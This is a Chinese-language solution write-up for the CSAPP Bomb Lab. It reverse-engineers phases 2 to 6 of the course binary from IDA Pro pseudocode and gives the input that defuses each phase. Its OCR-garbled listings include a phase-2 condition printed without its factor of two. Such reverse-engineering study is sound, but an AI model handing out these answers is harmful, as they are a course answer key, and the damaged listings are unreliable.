          int v3; // [rsp+0h] [rbp-38h] BYREF
13
          char v4; // [rsp+4h] [rbp-34h] BYREF
14
          char v5; // [rsp+18h] [rbp-20h] BYREF
          read_six_numbers(a1, &v3);
          if ( v3 != 1 )
18
               explode_bomb();
19
          v2 = &v4;
20
          do
          {
               result = (unsigned int)(2 * *((_DWORD *)v2 - 1));
              if ( *(_DWORD *)v2 != (_DWORD)result )
                   explode_bomb();
              v2 += 4;
          }
          while ( v2 != &v5 );
          return result;
29
```

Listing 2: Discompile by IDA Pro

### 观察后发现:

- 1. unk\_4025C3 处内存布局为 25 64 20 25 64 20 25 64 20 25 64 20 25 64 20 25 64 00。考虑到字符串的 x00 截断, unk 4025C3 为%d %d %d %d %d %d。
- 2. 翻阅cppreference可以发现 sscanf 会将给定的第一个参数视为缓冲区,从此处读取数据。
- 3. 只有把 a2 视为一个长度为 6 的 int 数组才能解释这两段代码。

这是修改后的代码:

```
___int64 __fastcall phase_2(__int64 a1)
{
          __int64 result; // rax
          int *v2; // rbx
          int v3[6]; // [rsp+0h] [rbp-38h] BYREF
          char v4; // [rsp+18h] [rbp-20h] BYREF

read_six_numbers(a1, v3);
if ( v3[0] != 1 )
          explode_bomb();

v2 = &v3[1];
do
```

Listing 3: Discompile by IDA Pro

1 DWORD = 4 BYTE<sup>7</sup> 解释一句,DWORD 基本上可以看作 unsigned int。 条件就是必须满足  $v_2[i] = v_2[i-1]$ 。 显然,在 v2 指针遍历完 v3 后就会移动至 v4,循环结束。 所以 Phase2 的 Payload 就是 1 2 4 8 16 32。

### 4.4 Phase3

```
__int64 __fastcall phase_3(__int64 a1)
          __int64 result; // rax
          int v2; // [rsp+8h] [rbp-10h] BYREF
          int v3; // [rsp+Ch] [rbp-Ch] BYREF
          if ( (int)__isoc99_sscanf(a1, "%d %d", &v2, &v3) <= 1 )</pre>
               explode_bomb();
          switch ( v2 )
           {
               case 0:
11
                   result = 207LL;
12
                   break;
               case 1:
                   result = 311LL;
                   break;
               case 2:
                   result = 707LL;
                   break;
19
               case 3:
20
                   result = 256LL;
                   break;
22
               case 4:
23
                    result = 389LL;
24
                   break;
```

<sup>&</sup>lt;sup>7</sup>Bits, Bytes, Words

```
case 5:
                    result = 206LL;
27
                    break;
                case 6:
29
                    result = 682LL;
                    break;
31
                case 7:
                    result = 327LL;
33
                    break;
                default:
                    explode_bomb();
36
                    return result;
           }
38
           if ( (_DWORD)result != v3 )
                explode_bomb();
40
           return result;
41
42
```

Listing 4: Discompile by IDA Pro

这个 Phase 的本意是让我们逆向 Assembly。而在汇编代码中, switch ... case 语句由跳转表实现, 需要一定基础才能逆向出来。

Payload 任选一个: 0 207。

### 4.5 Phase4

```
__int64 __fastcall phase_4(__int64 a1)
{
        __int64 result; // rax
        unsigned int v2; // [rsp+8h] [rbp-10h] BYREF
        int v3; // [rsp+Ch] [rbp-Ch] BYREF

        if ( (unsigned int)__isoc99_sscanf(a1, "%d %d", &v2, &v3) != 2 || v2 > 14 )
            explode_bomb();
        result = func4(v2, 0LL, 14LL);
        if ( (_DWORD)result || v3 )
            explode_bomb();
        return result;
    }
}
```

显然我们要满足:

1.  $v_2 \le 14$ 

接下来让我们分析 func4。

```
__int64 __fastcall func4(int a1, int a2, int a3)
{
    int v3; // ecx
    __int64 result; // rax

v3 = (a3 - a2) / 2 + a2;
    if ( v3 > a1 )
        return 2 * (unsigned int)func4(a1, a2, v3 - 1);
    result = 0LL;
    if ( v3 < a1 )
        result = 2 * (unsigned int)func4(a1, v3 + 1, a3) + 1;
    return result;
}</pre>
```

显然在  $v_3 = a_1$  的情况下函数 'func4'可以直接返回 0。

此时 
$$a_1 = v_3 = \lfloor \frac{(a_3 + a_2)}{2} \rfloor = \frac{0 + 14}{2} = 7$$
。

因此这个 Phase 的 Payload 就是 7 0。

另外一种解法是,考虑到 v2 可能的取值空间很小,我们可以用爆破的方法解出这道题。

### 4.6 Phase5

```
unsigned __int64 __fastcall phase_5(__int64 a1)
      {
          __int64 i; // rax
          char v3[8]; // [rsp+10h] [rbp-18h] BYREF
          unsigned __int64 v4; // [rsp+18h] [rbp-10h]
          v4 = __readfsqword(0x28u);
          if ( (unsigned int)string_length((_BYTE *)a1) != 6 )
              explode_bomb();
          for ( i = 0LL; i != 6; ++i )
10
              v3[i] = array_3449[*(_BYTE *)(a1 + i) & 0xF];
11
          v3[6] = 0;
12
          if ( (unsigned int)strings_not_equal(v3, "flyers") )
13
              explode_bomb();
14
          return __readfsqword(0x28u) ^ v4;
15
```

我们能够分析出两点:

- 1. a1 的长度应该是 6
- 2. 对于每个 a1 中的字符,取其 ASCII 码的最低四位作为索引,取 array\_3449 数组的对应位数组成新的字符串,该字符串必须为 flyers。

导出 array\_3449 数组的值后写出 exp。

```
from string import ascii_letters, digits
      array_3449 = [
2
        0x6D, 0x61, 0x64, 0x75, 0x69, 0x65, 0x72, 0x73, 0x6E, 0x66,
        0x6F, 0x74, 0x76, 0x62, 0x79, 0x6C
      target_str = "flyers"
      for chrs in target_str:
          for num in array_3449:
              if ord(chrs) != num:
                  continue;
11
              for i in range(10):
12
                  if chr(array_3449.index(num) + i * (0xf + 1)) in ascii_letters +
13
      digits:
                       print(chr(array_3449.index(num) + i * (0xf + 1)), end="")
14
                       break
```

Phase5 的 payload 为 9ON567。

### 4.7 Phase6

我们可以将函数 phase\_6 分为四个 sections。

#### 4.7.1 Section1

```
v1 = v15;
       read_six_numbers(a1, v15);
      v2 = 0;
      while (1)
      {
           if ( (unsigned int)(*v1 - 1) > 5 )
               explode_bomb();
           if ( ++v2 == 6 )
               break;
           v3 = v2;
10
           do
11
           {
12
               if ( *v1 == v15[v3] )
13
               explode_bomb();
14
               ++v3;
16
           while ( v3 <= 5 );</pre>
           ++v1;
18
19
```

分析出以下点:

• 输入为 6 个数组,存储在 v15 数组中。

- v2 为循环的标定参数,在达到 6 时结束循环
- v15 数组中每个数字不能大于 6, 也就是必须小于等于 6
- 对于 v15 数组中每个数,不能与后面的数相等

### 4.7.2 Section2

```
v4 = (char *)v15;

do

{
     *(_DWORD *)v4 = 7 - *(_DWORD *)v4;
     v4 += 4;
}
while ( v4 != &v16 );
```

将 v15 数组中每个数变成 7 减去它自身。

#### 4.7.3 Section3

```
for ( i = 0LL; i != 24; i += 4LL )
      {
          v8 = v15[i / 4];
3
          if ( v8 <= 1 )
           {
               v6 = &node1;
          }
          else
           {
               v7 = 1;
10
               v6 = &node1;
11
               do
12
13
               v6 = (QWORD *)v6[1];
14
               ++v7;
15
16
               while ( v7 != v8 );
          }
18
           *(_int64 *)((char *)&v17 + 2 * i) = (__int64)v6;
19
20
```

```
.data:00000000006032E0
                                                public node2
      .data:00000000006032E0 node2
                                                dd 0A8h
      .data:00000000006032E4
                                                dd 2
      .data:00000000006032E8
                                                dd 6032F0h
9
      .data:00000000006032EC
                                                dd 0
      .data:00000000006032F0
                                                public node3
11
      .data:00000000006032F0 node3
                                                dd 39Ch
12
      .data:00000000006032F4
                                                dd 3
13
      .data:00000000006032F8
                                                dd 603300h
14
      .data:00000000006032FC
                                                dd 0
      .data:0000000000603300
                                                public node4
16
      .data:0000000000603300 node4
                                                dd 2B3h
17
      .data:0000000000603304
                                                dd 4
18
      .data:0000000000603308
                                                dd 603310h
19
                                                dd 0
      .data:000000000060330C
20
      .data:0000000000603310
                                                public node5
21
      .data:0000000000603310 node5
                                                dd 1DDh
      .data:0000000000603314
                                                dd 5
      .data:0000000000603318
                                                dd 603320h
24
      .data:000000000060331C
                                                dd 0
      .data:0000000000603320
                                                public node6
26
                                                dd 1BBh
      .data:0000000000603320 node6
                                                dd 6
      .data:0000000000603324
28
      .data:0000000000603328
                                                dd 0
      .data:000000000060332C
                                                dd 0
30
```

我们可以看到, node 的结构很像一个结构体, 遵循着下面的结构:

"data + id + next node + 0"

接下来把 node[v8[i]] 的地址保存在 v17 中。

### 4.7.4 Section4

```
for ( j = v17; ; j = v12 )
{
      v12 = *(_QWORD *)v10;
      *(_QWORD *)(j + 8) = *(_QWORD *)v10;
      v10 += 8;
      if ( v10 == &v19 )
           break;
}
*(_QWORD *)(v12 + 8) = 0LL;
```

将后一个 node 的指针指向前一个 node, 也就是将 node 的顺序倒过来了。

```
v13 = 5;
do
{
result = **(unsigned int **)(v9 + 8);
```

如果(按照 node 的顺序),前者比后者的 data 小,那么炸弹爆炸。

我们将 node 按照 data 做一个排序:

"0x0A8 < 0x14C < 0x1BB < 0x1DD < 0x2B3 < 0x39C"

"2 < 1 < 6 < 5 < 4 < 3"

这是正确的顺序; 逆转之后变成了

"3 4 5 6 1 2"

与 7 减去自身后变成了:

"4 3 2 1 5 6"

这就是 Phase6 的 Payload。

### 5 Summary

首先,这道题最有利于锻炼自己逆向能力的解题方法是对着汇编代码硬磕。比如 Phase3 的 switch 跳转表: CSAPP 中专门花了 1 页来讲跳转表的机制以及为什么可以起到优化的效果。而 IDA Pro<sup>8</sup>无疑让这个过程缺少了不少乐趣。

其次,逆向的过程中也用到了很多 tricks——比如指针乱跳、内存操作等。CSAPP Labs 作为 CSAPP 稳坐 CS 神课第一把交椅的重要原因,其中的这个 Bomb Lab 更是让人印象深刻。可惜作为 self-learning 使用的 bomb 版本没有 autoGrader,没有爆炸一次就会减二分之一分数的惩罚,让我们在拆弹的过程中少了很多惊险 & 刺激。

 $<sup>^8 \</sup>mathrm{IDA}$  Pro - Hex Rays